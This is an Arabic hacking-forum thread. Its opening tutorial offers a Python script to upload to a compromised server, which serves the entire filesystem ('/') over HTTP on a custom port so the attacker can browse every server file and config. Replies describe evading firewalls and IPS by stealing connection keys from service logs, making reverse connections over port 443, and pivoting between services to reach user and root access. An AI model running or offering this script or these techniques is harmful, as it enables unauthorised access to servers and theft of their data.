.:تخطي الفوربدين عن طريق فتح بورت:.

[ABO-SAGER]

السلام عليكم ~

كيف الحال يا أحبتي في لله ~

اليوم معي شرح ان شاء الله راح يعجبكم ~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط ~

ان يكون السيرفر قابل انك تفتح فيه بورت ~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله ~

الخطوة الأولى ~

نرفع السكربت التالي بمتداد py ~

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd = SocketServer.TCPServer(("", port), Handler)

    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://maho.com:" + str(port))
    httpd.serve_forever()

هنا تضع البورت المراد فتحة في السيرفر ~

port = 13123

الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

python aa.py

الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا ~

http://www.xxx.com:13123

غير 13123 إلى البورت تبعك ~

والنتيجة ~

الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق ~

تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~​

 

[oblack]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

السلام عليكم ~

كيف الحال يا أحبتي في لله ~

اليوم معي شرح ان شاء الله راح يعجبكم ~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط ~

ان يكون السيرفر قابل انك تفتح فيه بورت ~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله ~

الخطوة الأولى ~

نرفع السكربت التالي بمتداد py ~

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd = SocketServer.TCPServer(("", port), Handler)

    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://maho.com:" + str(port))
    httpd.serve_forever()

هنا تضع البورت المراد فتحة في السيرفر ~

port = 13123

الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

python aa.py

الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا ~

http://www.xxx.com:13123

غير 13123 إلى البورت تبعك ~

والنتيجة ~

الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق ~

تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~​

طريقة رائعة للقيام بالاتصال العكسي ولكنها لاتجدي نفعا في السيرفرات القوية فا اغلب السيرفرات تقوم بتفعيل الفيرول ووضع رولز تمنع فتح اي بورت الفوربدين مشكلة صلاحيات فاذا كانت صلاحيتك اقل من يوزر بالسيرفر فالمشكلة تكون صعبه جدا

جاري تجريب طريقتك وتطويرها لتخطي عدد من الرولز التي تمنع فتح بورت بالاعتماد على بورتات مفتوحة بالسيرفر لخدمات اخرى و استغلالها بستخادم طريقة البايبنج وايضا المجيك باكيج وجراي تطوير برنامج بهذا الشئن ترقبونا

ملاحظة : استفدت من الفكرة كثيرا ورايح نقوم بتطويرها ان شاء الله بالقريب العاجل وجاري العمل من اللحظة .:12::14:

 

[ABO-SAGER]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

طيف هل في طريقة نعطل رولز

 

[Cyber Code]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

http://www.vbspiders.com/vb/t43175.html

[FONT=tahoma][SIZE=3]طيف هل في طريقة نعطل [FONT=tahoma][SIZE=3]رولز[/SIZE][/FONT] [/SIZE][/FONT]

بارك الله فيك, موضوع جميل

 

[oblack]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

طيف هل في طريقة نعطل رولز

في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .:14:

 

[ReD-HaT]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

موضوع في القمة
تحياتي لك

 

[ABO-SAGER]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

موضوع في القمة
تحياتي لك

الله يحيك

 

[ABO-SAGER]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .:14:

مشاء الله عليك باين عليك خبرة في هذا المجال :nosweat:

بنتظارك بعد تتطوير الفكرة

 

[vpn_31]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

تسلم على الطرح بس للأسف السيرفرات الحديثة مركبين فايرولات

 

[oblack]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

مشاء الله عليك باين عليك خبرة في هذا المجال :nosweat:

بنتظارك بعد تتطوير الفكرة

السلام عليكم اخواني قمت بدراسة الكود بشكل مفصل ومايحدث بالسيرفر للاسف الشديد هو لا يتخطى الفوربدين وانما يستعرض لك الملفات حسب الصلاحيات المتاحة لك وايضا ممكن الاستفادة منه في حال وجود بعض القيود على بورت 80 الخاص بتصفح من ناحية وجود صفحات انديكس تمنعك من رؤية الملفات الموجودة بالمجلد , الشيل costa cgi-station الذي عرضته بموضوعي السابق يحل هذه المشكلة وبطريقة افضل من فتح بورت لانه سوف تواجة مشكله بعد فتح البورت حيث يتعرف عليه نظام الحماية الموجود باللينكس خاصه بالاصدارات الحديثة وتصبح لديك مشكلة انتيرنل سيرفر ايرور مع العلم اني قمت بتجربته بسيرفر نظام اوبينتوا 11 وليس 12 .

وايضا لا يمكنك وضع بورت مفتوح بالسيرفر لان نظام الحماية مباشرة رايح يقوم بكتشاف الكود و تعرف عليه على انه باك دور .

اقوم لان بوضع المرحلة الثانيه من البحث لتطوير الفكرة بستخدام تقنية البايبنج وهيه تقنيه ليست بالسهله لاستغلال الصلاحية من خلال التنقل بين المنافذ المفتوحة واستغلال صلاحية البرامج للحصول على صلاحية يوزر ومن ثم صلاحية روت اتمنى من لدية الخبرة ان يساعدني في اتمام هذا البحث حتى افرغ منه بشكل اسرع .
:14::14::14:

 

[القاتل المتسلسل]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

طريقة ولا اروع مشكووور اخوي تستاهل تقييم

 

[KaLa$nikoV]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

بارك الله فيك
يعطيك الف عافيه

 

[V!rus Yasscom]

رد: .:تخطي الفوربدين عن طريق فتح بورت:.

مشكووووووووووور تسلللّم اخي بارك الله فيييك